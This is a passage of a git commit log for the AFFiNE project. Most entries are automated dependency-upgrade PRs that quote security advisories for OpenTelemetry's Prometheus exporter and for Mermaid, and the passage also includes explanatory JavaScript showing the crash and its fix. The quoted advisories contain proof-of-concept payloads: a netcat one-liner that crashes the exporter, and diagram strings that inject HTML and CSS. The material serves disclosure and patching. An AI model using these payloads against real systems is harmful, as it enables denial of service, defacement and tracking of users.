- [#&#8203;3839](https://redirect.github.com/nestjs/swagger/pull/3839)
feat: add excludeDynamicDefaults option to strip runtime-evaluated
schema defaults
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
- [#&#8203;3841](https://redirect.github.com/nestjs/swagger/pull/3841)
feat: add DeepPartialType mapped-type helper for recursive optional
properties
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))

##### Dependencies

- [#&#8203;3850](https://redirect.github.com/nestjs/swagger/pull/3850)
fix(deps): update dependency swagger-ui-dist to v5.32.4
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))

##### Committers: 7

- JongHun Lim
([@&#8203;leemhoon00](https://redirect.github.com/leemhoon00))
- Maruthan G
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- Rajasekar Janakiraman
([@&#8203;rajasekar33](https://redirect.github.com/rajasekar33))
- Supun Geethanjana Jayasinghe
([@&#8203;SupunGeethanjana](https://redirect.github.com/SupunGeethanjana))
- Temrjan ([@&#8203;temrjan](https://redirect.github.com/temrjan))
- Vito Macchia
([@&#8203;lamuertepeluda](https://redirect.github.com/lamuertepeluda))
-
[@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-14 01:25:23 +08:00
DarkSky 659072183c chore: bump deps 2026-05-13 22:26:02 +08:00
DarkSky e222f06e94 feat(editor): extract chat runtime (#14937)
#### PR Dependency Tree


* **PR #14937** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Centralized AI event system and a runtime powering chat sessions and
actions.

* **Improvements**
* Chat UI (composer, messages, toolbar, tabs, panels) now syncs with
runtime snapshots for more consistent state.
* Improved session/tab lifecycle (create, fork, delete), context
embedding status, and history handling.
* More reliable send/stop/retry flows, better telemetry scoping, and
clearer upgrade/login/insert-template prompts.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-13 21:57:50 +08:00
DarkSky 322f2ba986 fix(server): migrate old tables (#14954) 2026-05-13 21:57:28 +08:00
renovate[bot] f19a922793 chore: bump up @opentelemetry/sdk-node version to ^0.217.0 [SECURITY] (#14945)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.215.0` →
`^0.217.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.215.0/0.217.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-node/0.217.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-node/0.215.0/0.217.0?slim=true)
|

---

### Prometheus exporter process crash via malformed HTTP request
[CVE-2026-44902](https://nvd.nist.gov/vuln/detail/CVE-2026-44902) /
[GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)

<details>
<summary>More information</summary>

#### Details
##### Summary

A single malformed HTTP request crashes any Node.js process running the
OpenTelemetry JS Prometheus exporter. The metrics endpoint (default
`0.0.0.0:9464`) has no error handling around URL parsing, so a request
with an invalid URI causes an uncaught `TypeError` that terminates the
process.

**You are affected by this vulnerability if either of the following
apply to your application:**

* you directly use `@opentelemetry/exporter-prometheus` in your code
through its built-in server.
* your `OTEL_METRICS_EXPORTER` environment variable includes
`prometheus` **AND**
  * you use `@opentelemetry/sdk-node`
* you use `@opentelemetry/auto-instrumentations-node` via `--require
@opentelemetry/auto-instrumentations-node/register`/`--import
@opentelemetry/auto-instrumentations-node/register`

##### Impact

**Denial of service.** Any application using the OpenTelemetry
Prometheus exporter’s built-in server can be crashed by a single
unauthenticated network packet sent to the metrics port. No
authentication, special privileges, or prior access is required.

##### Remediation

##### Update to the fixed version

Update `@opentelemetry/exporter-prometheus` and
`@opentelemetry/sdk-node` to version **0.217.0** or later.
Update `@opentelemetry/auto-instrumentations-node` to version **0.75.0**
or later.

This release adds proper error handling around the URL constructor,
returning an HTTP `400` response on parse failure rather than allowing
the exception to propagate and crash the process.

```
npm install @opentelemetry/exporter-prometheus@latest
```

##### Do Not Expose the Endpoint to Untrusted Users

> [!IMPORTANT] 
> The following mitigations reduce exposure but do not fully remediate
the vulnerability. Any client that *can* reach the metrics endpoint -
including your own Prometheus scraper host if compromised - could still
trigger the crash. Updating to **0.217.0** is the recommended
resolution.

If updating is not immediately feasible, restrict access to the metrics
endpoint so that it is not reachable by untrusted or unauthenticated
network clients. For example:

* **Bind to localhost only** by setting the `host` option to `127.0.0.1`
when configuring the `PrometheusExporter`, so the port is not exposed on
public or shared network interfaces

* **Use a firewall or network policy** to restrict access to port `9464`
(or whichever port you have configured) to only trusted Prometheus
scrape hosts

* **Place the endpoint behind a reverse proxy** that filters or
validates incoming requests before they reach the exporter

##### Details

In `PrometheusExporter.ts`, the `_requestHandler` calls `new
URL(request.url, this._baseUrl)` without any error handling. Node's HTTP
parser accepts absolute-form URIs (e.g. `http://`) for proxy
compatibility, including malformed ones. When `request.url` is
`"http://"`, the `URL` constructor throws `TypeError: Invalid URL`.
Since there is no try-catch in the handler, the exception propagates as
an uncaught exception and crashes the process.

The Prometheus metrics endpoint is unauthenticated by design (Prometheus
scrapes it) and binds to `0.0.0.0` by default, meaning it is reachable
by any network client that can connect to the metrics port.

##### Proof of Concept

Start any Node.js application with the Prometheus exporter running on
the default port `9464`, then send a single raw TCP packet:

```
echo -ne 'GET http:// HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc localhost 9464
```

The process crashes immediately with:

```
TypeError: Invalid URL
    at new URL (...)
    at PrometheusExporter._requestHandler (...)
```

#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`

#### References
-
[https://github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3)
-
[https://github.com/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>open-telemetry/opentelemetry-js
(@&#8203;opentelemetry/sdk-node)</summary>

###
[`v0.217.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c)

###
[`v0.216.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-12 18:55:30 +08:00
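
The failure mode and the fix described in the CVE-2026-44902 advisory above, as an added JavaScript example; it is not the opentelemetry-js source and not part of the commit message. `BASE_URL`, the handler and helper names, the `/metrics` route and the sample metric line are constructed for illustration.

```javascript
// Added illustration of the pattern in the advisory: an HTTP request handler
// that parses request.url with `new URL(...)`. All names here are hypothetical.

const BASE_URL = 'http://localhost:9464/'; // assumed base, matching the default port

// Constructed sample payload in Prometheus text format.
const SAMPLE_METRICS = '# TYPE demo_requests_total counter\ndemo_requests_total 1\n';

// Shared routing once a pathname is known.
function respond(response, pathname) {
  if (pathname === '/metrics') {
    response.writeHead(200, { 'content-type': 'text/plain' });
    response.end(SAMPLE_METRICS);
  } else {
    response.writeHead(404);
    response.end();
  }
}

// Unguarded form: no error handling around the URL constructor. A request
// target of "http://" makes `new URL` throw TypeError, and inside a real
// http.Server callback that exception is uncaught and ends the process.
function unguardedHandler(request, response) {
  const { pathname } = new URL(request.url, BASE_URL);
  respond(response, pathname);
}

// Guarded parse: return null instead of throwing on an unparsable target.
function parseRequestUrl(rawUrl) {
  if (typeof rawUrl !== 'string') return null;
  try {
    return new URL(rawUrl, BASE_URL);
  } catch (err) {
    if (err instanceof TypeError) return null; // invalid URL
    throw err; // anything else is unexpected; do not hide it
  }
}

// Guarded form: answer 400 on parse failure, as the advisory says the fixed
// release does, so one bad request cannot take the process down.
function guardedHandler(request, response) {
  const parsed = parseRequestUrl(request.url);
  if (parsed === null) {
    response.writeHead(400);
    response.end();
    return;
  }
  respond(response, parsed.pathname);
}

// Minimal stand-in for http.ServerResponse so the handlers can be exercised
// offline. Returns what the handler wrote, or the exception it threw.
function simulate(handler, rawUrl) {
  const result = { status: null, body: null, threw: null };
  const response = {
    writeHead(code) { result.status = code; return this; },
    end(body) { result.body = body === undefined ? '' : body; },
  };
  try {
    handler({ url: rawUrl }, response);
  } catch (err) {
    result.threw = err;
  }
  return result;
}

// Constructed request targets: normal scrape, absolute-form scrape,
// unknown path, and the malformed absolute-form target from the advisory.
const SAMPLE_TARGETS = ['/metrics', 'http://localhost:9464/metrics', '/other', 'http://'];

function compareHandlers() {
  return SAMPLE_TARGETS.map((target) => ({
    target,
    unguarded: simulate(unguardedHandler, target),
    guarded: simulate(guardedHandler, target),
  }));
}

// To serve it, pass guardedHandler to http.createServer and listen on
// 127.0.0.1 rather than 0.0.0.0, per the advisory's bind-to-localhost advice.
```
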
DarkSky a1d150a748 fix(server): realtime module not loaded (#14952)
#### PR Dependency Tree


* **PR #14952** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Refactor**
* Optimized workspace invite link fetching by separating it from general
workspace configuration queries for improved performance.
* Reorganized transcription-related backend modules to better separate
concerns and enable real-time functionality.

* **Chores**
* Updated generated GraphQL types and iOS query definitions to reflect
API changes.

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14952)

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-12 18:54:42 +08:00
renovate[bot] ac6d0d35af chore: bump up @opentelemetry/exporter-prometheus version to ^0.217.0 [SECURITY] (#14944)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.215.0` →
`^0.217.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.215.0/0.217.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fexporter-prometheus/0.217.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fexporter-prometheus/0.215.0/0.217.0?slim=true)
|

---

### Prometheus exporter process crash via malformed HTTP request
[CVE-2026-44902](https://nvd.nist.gov/vuln/detail/CVE-2026-44902) /
[GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)

<details>
<summary>More information</summary>

#### Details
##### Summary

A single malformed HTTP request crashes any Node.js process running the
OpenTelemetry JS Prometheus exporter. The metrics endpoint (default
`0.0.0.0:9464`) has no error handling around URL parsing, so a request
with an invalid URI causes an uncaught `TypeError` that terminates the
process.

**You are affected by this vulnerability if either of the following
apply to your application:**

* you directly use `@opentelemetry/exporter-prometheus` in your code
through its built-in server.
* your `OTEL_METRICS_EXPORTER` environment variable includes
`prometheus` **AND**
  * you use `@opentelemetry/sdk-node`
* you use `@opentelemetry/auto-instrumentations-node` via `--require
@opentelemetry/auto-instrumentations-node/register`/`--import
@opentelemetry/auto-instrumentations-node/register`

##### Impact

**Denial of service.** Any application using the OpenTelemetry
Prometheus exporter’s built-in server can be crashed by a single
unauthenticated network packet sent to the metrics port. No
authentication, special privileges, or prior access is required.

##### Remediation

##### Update to the fixed version

Update `@opentelemetry/exporter-prometheus` and
`@opentelemetry/sdk-node` to version **0.217.0** or later.
Update `@opentelemetry/auto-instrumentations-node` to version **0.75.0**
or later.

This release adds proper error handling around the URL constructor,
returning an HTTP `400` response on parse failure rather than allowing
the exception to propagate and crash the process.

```
npm install @opentelemetry/exporter-prometheus@latest
```

##### Do Not Expose the Endpoint to Untrusted Users

> [!IMPORTANT] 
> The following mitigations reduce exposure but do not fully remediate
the vulnerability. Any client that *can* reach the metrics endpoint -
including your own Prometheus scraper host if compromised - could still
trigger the crash. Updating to **0.217.0** is the recommended
resolution.

If updating is not immediately feasible, restrict access to the metrics
endpoint so that it is not reachable by untrusted or unauthenticated
network clients. For example:

* **Bind to localhost only** by setting the `host` option to `127.0.0.1`
when configuring the `PrometheusExporter`, so the port is not exposed on
public or shared network interfaces

* **Use a firewall or network policy** to restrict access to port `9464`
(or whichever port you have configured) to only trusted Prometheus
scrape hosts

* **Place the endpoint behind a reverse proxy** that filters or
validates incoming requests before they reach the exporter

##### Details

In `PrometheusExporter.ts`, the `_requestHandler` calls `new
URL(request.url, this._baseUrl)` without any error handling. Node's HTTP
parser accepts absolute-form URIs (e.g. `http://`) for proxy
compatibility, including malformed ones. When `request.url` is
`"http://"`, the `URL` constructor throws `TypeError: Invalid URL`.
Since there is no try-catch in the handler, the exception propagates as
an uncaught exception and crashes the process.

The Prometheus metrics endpoint is unauthenticated by design (Prometheus
scrapes it) and binds to `0.0.0.0` by default, meaning it is reachable
by any network client that can connect to the metrics port.

##### Proof of Concept

Start any Node.js application with the Prometheus exporter running on
the default port `9464`, then send a single raw TCP packet:

```
echo -ne 'GET http:// HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc localhost 9464
```

The process crashes immediately with:

```
TypeError: Invalid URL
    at new URL (...)
    at PrometheusExporter._requestHandler (...)
```

#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`

#### References
- [https://github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3)
- [https://github.com/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>open-telemetry/opentelemetry-js
(@opentelemetry/exporter-prometheus)</summary>

###
[`v0.217.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c)

###
[`v0.216.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.


---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-12 16:21:10 +08:00
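
The crash mechanism from the `@opentelemetry/exporter-prometheus` advisory in the commit above, as an added example that is not code from the commit, the advisory or the OpenTelemetry project: an unguarded `new URL(request.url, base)` handler beside one that returns `400` on parse failure, run over constructed request targets. `BASE_URL`, `route`, `fakeResponse`, `simulate`, `compareHandlers` and both handler names are assumptions made for illustration.

```javascript
// Assumed base URL; the advisory only says the handler passes this._baseUrl.
const BASE_URL = 'http://localhost:9464/';

// Constructed request targets, as Node's HTTP parser would expose them in
// request.url. "http://" is the malformed absolute-form URI from the advisory.
const SAMPLE_TARGETS = [
  '/metrics',
  '/metrics?format=text',
  'http://localhost:9464/metrics',
  '/favicon.ico',
  'http://',
];

// Minimal stand-in for http.ServerResponse (hypothetical test double).
function fakeResponse() {
  return {
    statusCode: 200,
    body: '',
    end(text) { this.body = text || ''; },
  };
}

// Shared routing: only /metrics is served, everything else is a 404.
function route(pathname, response) {
  if (pathname === '/metrics') {
    response.statusCode = 200;
    response.end('# metrics would be serialized here');
  } else {
    response.statusCode = 404;
    response.end('Not Found');
  }
}

// Pre-fix shape: the URL constructor runs with no error handling, so a
// TypeError escapes the request handler.
function unguardedHandler(request, response) {
  const { pathname } = new URL(request.url, BASE_URL);
  route(pathname, response);
}

// Post-fix shape described in the advisory: a parse failure becomes an
// HTTP 400 instead of an exception that leaves the handler.
function guardedHandler(request, response) {
  let pathname;
  try {
    ({ pathname } = new URL(request.url, BASE_URL));
  } catch (err) {
    response.statusCode = 400;
    response.end('Bad Request');
    return;
  }
  route(pathname, response);
}

// Drives one handler with one target. The catch here only records the
// escape; in a real server nothing sits above the handler, so the same
// exception is uncaught and the process exits.
function simulate(handler, target) {
  const response = fakeResponse();
  try {
    handler({ url: target }, response);
    return { target, status: response.statusCode, crashed: false };
  } catch (err) {
    return { target, status: null, crashed: true, error: err.name };
  }
}

// Runs every constructed target through both handlers.
function compareHandlers() {
  return SAMPLE_TARGETS.map((target) => ({
    target,
    unguarded: simulate(unguardedHandler, target),
    guarded: simulate(guardedHandler, target),
  }));
}

for (const row of compareHandlers()) {
  const before = row.unguarded.crashed ? 'exception escapes' : row.unguarded.status;
  console.log(`${JSON.stringify(row.target)}: unguarded=${before} guarded=${row.guarded.status}`);
}
```

A regression test for an upgraded deployment can assert the same property: the malformed target yields a `400` and the next scrape of `/metrics` still succeeds.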
renovate[bot] 6b720206c6 chore: bump up mermaid version to v11.15.0 [SECURITY] (#14946)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [mermaid](https://redirect.github.com/mermaid-js/mermaid) | [`11.13.0` → `11.15.0`](https://renovatebot.com/diffs/npm/mermaid/11.13.0/11.15.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/mermaid/11.15.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/mermaid/11.13.0/11.15.0?slim=true) |

---

### Mermaid: Improper sanitization of `classDef` in state diagrams leads to HTML injection
[CVE-2026-41149](https://nvd.nist.gov/vuln/detail/CVE-2026-41149) / [GHSA-ghcm-xqfw-q4vr](https://redirect.github.com/advisories/GHSA-ghcm-xqfw-q4vr)

<details>
<summary>More information</summary>

#### Details
##### Impact

Under the default configuration, Mermaid state diagram's `classDef`
allows DOM injection that escapes the SVG, although `<script>` tags are
removed, preventing XSS.

##### Proof-of-concept

```
stateDiagram-v2
  classDef xss fill:red</style></svg><style>*{x:x;y:y;overflow:visible!important;contain:none!important;transform:none!important;filter:none!important;clip-path:none!important}</style><div style="x:x;y:y;color:red;font:5em/1 monospace;display:grid;place-items:center;z-index:2147483647;width:100vw;height:100vh;position:fixed;top:0;left:0;background:black">HACKED</div><svg><style>a:b
  [*] --> A:::xss
```

##### Patches

- [v11.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [37ff937f1da2e19f882fd1db01235db4d01f4056](https://redirect.github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056))
- [v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3](https://redirect.github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3))

##### Workarounds

If you cannot update to a patched version, setting [`"securityLevel":
"sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel)
will prevent this, by rendering the mermaid diagram in a sandboxed
`<iframe>`.

##### Credits

Thanks to @zsxsoft from @KeenSecurityLab for reporting
this vulnerability.

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L`

#### References
-
[https://github.com/mermaid-js/mermaid/security/advisories/GHSA-ghcm-xqfw-q4vr](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-ghcm-xqfw-q4vr)
-
[https://github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056](https://redirect.github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056)
-
[https://github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3](https://redirect.github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3)
-
[https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
-
[https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
-
[https://mermaid.js.org/config/schema-docs/config.html#securitylevel](https://mermaid.js.org/config/schema-docs/config.html#securitylevel)
-
[https://github.com/advisories/GHSA-ghcm-xqfw-q4vr](https://redirect.github.com/advisories/GHSA-ghcm-xqfw-q4vr)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-ghcm-xqfw-q4vr)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Mermaid: Improper sanitization of `classDefs` in diagrams leads to CSS injection
[CVE-2026-41148](https://nvd.nist.gov/vuln/detail/CVE-2026-41148) / [GHSA-xcj9-5m2h-648r](https://redirect.github.com/advisories/GHSA-xcj9-5m2h-648r)

<details>
<summary>More information</summary>

#### Details
##### Details

The state diagram and any other diagram type that routes user-controlled
style strings through createCssStyles parser for Mermaid v11.14.0 and
earlier captures `classDef` values with an unrestricted regex:

```jison
// packages/mermaid/src/diagrams/state/parser/stateDiagram.jison:83
<CLASSDEFID>[^\n]*   { this.popState(); return 'CLASSDEF_STYLEOPTS' }
```

The value passes unsanitized through `addStyleClass()` ->
`createCssStyles()` -> `style.innerHTML` (mermaidAPI.ts:418). A `}` in
the value closes the generated CSS selector, and everything after
becomes a new CSS rule on the page.

##### PoC

```
stateDiagram-v2 
      classDef x }*{ background-image: url("http://media.giphy.com/media/SggILpMXO7Xt6/giphy.gif")}
```

Live demo:

<https://mermaid.live/edit#pako:eNpFjzFvgzAQhf-KdVNbEcBgMHhtlkqtOnSJKi8ONsYKBmRMlRTx3-skanvTfbp7996t0IxSAYPZC6_2Rmgn7O4rQ00v5nmvWnRG29OKjqI5aTcug9wZK7RiaHH9A4fO-4kliVXSiFibqbvEzWjvnHxo_fI6vR3e6cGXyX2qTcvhcYMItDMSmHeLisAqZ8UVYeUDQhx8p6ziwEIrhTtx4MNVM4nhcxztrywE0h2wVvRzoGWS_z_8rahBKvcckntgmN5OAFvhDIzUNCZZQXCR5nVaZkUEF2BVFpOcEkoxxhUuyRbB980yjStapKHqoKFlhvPtB7BFZEU>

##### Patches

This has been patched in:

- [v11.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [e9b0f34d8d82a6260077764ee45e1d7d90957a0f](https://redirect.github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f))
- [v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [8fead23c59166b7bab6a39eac81acebee2859102](https://redirect.github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102))

##### Workarounds

Setting [`"securityLevel":
"sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel)
will prevent this, by rendering the mermaid diagram in a sandboxed
`<iframe>`.

##### Impact

Enables page defacement, user tracking via `url()` callbacks, and DOM
attribute exfiltration via CSS `:has()` selectors.

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L`

#### References
-
[https://github.com/mermaid-js/mermaid/security/advisories/GHSA-xcj9-5m2h-648r](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-xcj9-5m2h-648r)
-
[https://github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102](https://redirect.github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102)
-
[https://github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f](https://redirect.github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f)
-
[https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
-
[https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
-
[https://mermaid.js.org/config/schema-docs/config.html#securitylevel](https://mermaid.js.org/config/schema-docs/config.html#securitylevel)
-
[https://github.com/advisories/GHSA-xcj9-5m2h-648r](https://redirect.github.com/advisories/GHSA-xcj9-5m2h-648r)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-xcj9-5m2h-648r)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Mermaid: Improper sanitization of configuration leads to CSS injection
[CVE-2026-41159](https://nvd.nist.gov/vuln/detail/CVE-2026-41159) / [GHSA-87f9-hvmw-gh4p](https://redirect.github.com/advisories/GHSA-87f9-hvmw-gh4p)

<details>
<summary>More information</summary>

#### Details
##### Impact

Mermaid's default configuration allows injecting CSS that applies
outside of the Mermaid diagram via the `fontFamily`, `themeCSS`, and
`altFontFamily` configuration options.

Live demo:
[mermaid.live](https://mermaid.live/edit#pako:eNpNjktLxDAUhf9KvFBR6JS-60QQfODKlUvJ5k6TtsEmKTHFGUP-u-mI6Nmdy3fOPR56wwVQSBIvtXSUeAaD0e4ZlZxPDChhcLxFfwiEauOuLq_9Afv30ZpVczpaITS5kGox1qF2gfSeBwYhJAnThAyz-ewntI68vG5-0z3Z7e7IA9OQwmglB-rsKlJQwircLPgNZeAmocTPAi4GXGfHgOkQYwvqN2PUbzJuGSegA84f0a0LRyeeJI4W_xChubCPcbQD2pwbgHo4Aq2aKmvbqq3zoiu7pizqFE6RybN9VFfFY1HWXRVS-Dr_zLObrt7_V_gGGXZlGg)

Example code:

```
%%{init: {"fontFamily": "x;a{b} :not(&){background:green !important} c{d}"}}%%
flowchart LR
    A --> B
```

The injected CSS exploits stylis's `&` (scope reference) handling.
